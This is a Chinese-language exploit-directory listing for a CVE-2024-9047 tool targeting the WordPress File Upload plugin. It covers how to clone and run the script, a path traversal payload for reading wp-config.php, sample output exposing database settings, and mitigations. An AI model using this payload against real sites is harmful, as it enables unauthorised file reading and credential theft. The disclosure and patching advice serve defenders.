Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9047-Exploit — 针对 WordPress 文件上传插件的漏洞利用 - 所有版本至 4.24.11 均受影响。 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-9047-exploit
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

针对 WordPress 文件上传插件的漏洞利用 - 所有版本至 4.24.11 均受影响。

查看仓库
411年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-9047:WordPress 文件上传插件漏洞利用

描述

WordPress 文件上传 插件的所有版本(包括 4.24.11 及更早版本)中存在一个 路径遍历 漏洞,该漏洞位于 wfu_file_downloader.php 文件中。此漏洞允许未经身份验证的攻击者读取或删除预期目录之外的文件。成功利用此漏洞需要目标 WordPress 站点运行 PHP 7.4 或更早版本。

影响

  • 严重性: 严重
  • CVSS 评分: 9.8(严重)
  • 攻击向量: 网络
  • 是否需要身份验证: 否

利用方式

攻击者可以通过向存在漏洞的端点 wfu_file_downloader.php 发送特制请求,并操纵文件路径参数,从而获得对服务器上敏感文件的未授权访问。


漏洞利用详情

要求

  • 目标 WordPress 站点必须安装有存在漏洞的插件版本(4.24.11 或更早版本)。
  • 服务器必须运行 PHP 版本 7.4 或更早版本。

利用步骤

  1. 克隆此仓库:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. 安装 Python 依赖(如果需要):

    root@kitploit:~
    pip install requests
    
  3. 运行脚本以检查插件版本并利用漏洞:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

示例用法

利用默认的漏洞配置并读取 WordPress 配置文件:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

结果

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


缓解措施

保护您的 WordPress 站点:

  1. 将 WordPress 文件上传 插件更新到最新版本。
  2. 确保 PHP 版本更新到受支持的版本(高于 7.4)。
  3. 限制文件权限以防止对敏感文件的未授权访问。
  4. 使用 Web 应用防火墙(WAF)阻止恶意请求。

免责声明

此代码仅用于教育和研究目的。在未获得明确许可的系统上未授权使用此脚本是非法且不道德的。作者对此代码的任何滥用行为不承担责任。

下载工具